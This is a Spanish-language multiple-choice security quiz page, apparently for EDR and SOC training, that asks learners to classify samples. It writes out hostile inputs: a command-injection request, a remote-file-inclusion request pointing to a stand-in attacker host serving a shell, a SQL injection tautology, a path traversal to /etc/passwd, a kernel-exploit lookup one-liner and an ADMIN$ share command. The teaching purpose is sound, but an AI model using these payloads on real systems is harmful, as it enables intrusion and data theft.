Quiz de Seguridad Informática y EDR

Quiz de Seguridad Informática y EDR

Professional Development

8 Qs

quiz-placeholder

Similar activities

BOUNTYHUNTER Walkthrough Quiz

BOUNTYHUNTER Walkthrough Quiz

Professional Development

5 Qs

Lesson 1 Review

Lesson 1 Review

Professional Development

8 Qs

Quiz de Seguridad Informática y EDR

Quiz de Seguridad Informática y EDR

Assessment

Quiz

Computers

Professional Development

Hard

Created by

Guillermo Cuesta

Used 3+ times

FREE Resource

AI

Enhance your content

Add similar questions
Adjust reading levels
Convert to real-world scenario
Translate activity
More...

8 questions

Show all answers

1.

MULTIPLE CHOICE QUESTION

3 mins • 1 pt

Con que esta relacionado el siguiente hash:

94c37650f04d1723af41c74298f2287d

Vidar

Costco

Remcos

Quasar

Emotet

2.

MULTIPLE CHOICE QUESTION

30 sec • 1 pt

Nos encontramos con:
uname -a

echo "internal user"

curl https://raw.githubusercontent.com/lucyoa/kernel-exploits/master/README.md 2>/dev/null | grep "Kernels: " | cut -d ":" -f 2 | cut -d "<" -f 1 | tr -d "," | tr ' ' '\n' | grep -v "^\d\.\d$" | sort -u -r | tr '\n' ' '

¿Que intenta?

Sacar el Sistema Operativo

Es un malware malisimo

La ejecución esta relacionada con la botnet Mirai

La ejecución esta buscando un exploit

3.

FILL IN THE BLANK QUESTION

1 min • 1 pt

Completa el comando "cmd.exe /Q /C ls 1> \\\\127.0.0.1\ADMIN$\__1722938375 "

4.

MULTIPLE CHOICE QUESTION

30 sec • 1 pt

Día que Crowdstrike metió mucho la pata

17/7/24

10/7/24

29/7/24

19/7/24

5.

MULTIPLE CHOICE QUESTION

30 sec • 1 pt

Que es esto:

GET /vulnerable.php?cmd=echo%20$(id) HTTP/1.1

Host: vulnerable-website.com

User-Agent: Mozilla/5.0

Accept: text/html

SQLI

RFI

LFI

RCE

6.

MULTIPLE CHOICE QUESTION

30 sec • 1 pt

Que es esto:

GET /index.php?page=http://evil-site.com/shell.txt HTTP/1.1

Host: vulnerable-website.com

User-Agent: Mozilla/5.0

Accept: text/html

SQLI

RFI

LFI

RCE

7.

MULTIPLE CHOICE QUESTION

30 sec • 1 pt

Que es esto:

GET /products?id=1' OR '1'='1 HTTP/1.1

Host: vulnerable-website.com

User-Agent: Mozilla/5.0

Accept: text/html

SQLI

RFI

LFI

RCE

8.

MULTIPLE CHOICE QUESTION

30 sec • 1 pt

Que es esto:

GET /index.php?page=../../../../etc/passwd HTTP/1.1

Host: vulnerable-website.com

User-Agent: Mozilla/5.0

Accept: text/htm

SQLI

RFI

LFI

RCE